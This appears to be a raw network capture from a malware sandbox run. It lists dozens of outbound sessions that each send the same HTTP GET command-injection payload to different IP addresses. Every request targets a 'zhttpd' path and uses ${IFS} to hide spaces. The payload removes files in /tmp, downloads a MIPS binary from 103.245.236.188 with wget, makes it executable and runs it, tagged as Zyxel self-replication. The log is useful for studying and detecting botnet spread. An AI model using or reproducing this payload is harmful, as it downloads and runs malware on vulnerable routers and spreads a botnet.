                                    Jan 13, 2024 19:02:50.563776016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8636192.168.2.1341202105.182.170.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.563808918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8637192.168.2.1340222110.40.47.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.563847065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8638192.168.2.13409781.12.178.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.563949108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8639192.168.2.135844612.52.188.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.563997984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8640192.168.2.1333886172.209.179.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.564024925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8641192.168.2.1336618189.169.137.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.564095020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8642192.168.2.135542423.153.139.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.564125061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8643192.168.2.135428649.73.214.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.564172983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8644192.168.2.134763291.129.220.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.564218044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8645192.168.2.13561621.241.131.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.564250946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8646192.168.2.1343114111.87.127.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.564313889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8647192.168.2.135507848.192.6.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.564352036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8648192.168.2.1345882135.68.79.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.564393044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8649192.168.2.13608248.72.125.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.564466000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8650192.168.2.1347360183.198.185.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.564500093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8651192.168.2.1334266222.48.33.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.564554930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8652192.168.2.133631652.239.232.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.564601898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8653192.168.2.1346912106.157.110.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.564631939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8654192.168.2.1352376223.48.234.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.564682961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8655192.168.2.1351134122.168.17.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.564728975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8656192.168.2.133541037.78.20.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.564759016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8657192.168.2.1354064150.243.8.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.564817905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8658192.168.2.1349796171.178.108.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.564858913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8659192.168.2.1342286112.53.136.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.568854094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8660192.168.2.1335608125.24.229.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.583431959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8661192.168.2.1333070210.204.153.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.583589077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8662192.168.2.1355770170.126.19.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.583632946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8663192.168.2.134892245.227.188.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.583684921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8664192.168.2.133585831.32.121.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.583738089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8665192.168.2.1341152131.121.180.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.583797932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8666192.168.2.1349628141.210.118.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.583846092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8667192.168.2.136014419.254.110.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.583914995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8668192.168.2.135868257.130.254.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.583956003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8669192.168.2.1351936170.241.66.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.584023952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8670192.168.2.1342960208.139.238.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.584068060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8671192.168.2.13489828.255.1.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.584119081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8672192.168.2.134673280.237.50.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.584181070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8673192.168.2.1356206177.192.236.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.584249020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8674192.168.2.133359677.189.84.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.584302902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8675192.168.2.1335438114.48.184.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.584356070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8676192.168.2.134657267.57.193.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.584408045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8677192.168.2.134365043.50.191.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.584455013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8678192.168.2.1349744145.8.106.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.584516048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8679192.168.2.1339346159.90.108.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.584553957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8680192.168.2.1343068173.202.16.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.584614992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8681192.168.2.1349458179.90.21.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.584681034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8682192.168.2.134469443.246.31.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.584714890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8683192.168.2.1351310149.88.86.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.584758997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8684192.168.2.1360120216.207.117.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.584820032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8685192.168.2.1350134167.220.219.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.584860086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8686192.168.2.1343440118.117.44.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.584907055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8687192.168.2.1337274177.32.236.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.584955931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8688192.168.2.135670631.51.68.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.585016012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8689192.168.2.133973023.64.145.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.585079908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8690192.168.2.1359940151.17.227.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.585139990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8691192.168.2.135451659.195.98.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.585196972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8692192.168.2.1341492209.119.102.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.585257053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8693192.168.2.134737498.68.148.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.585304976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8694192.168.2.134624051.81.56.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.585340977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8695192.168.2.1344522160.7.90.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.585402012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8696192.168.2.135028625.63.135.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.585469007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8697192.168.2.1343920100.232.82.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.585496902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8698192.168.2.1347666111.161.183.39443
                                    TimestampBytes transferredDirectionData
